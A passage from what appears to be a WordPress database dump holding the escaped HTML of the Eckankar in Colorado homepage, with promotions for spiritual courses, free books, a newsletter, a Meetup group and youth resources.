class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 8px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241338,41021,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" 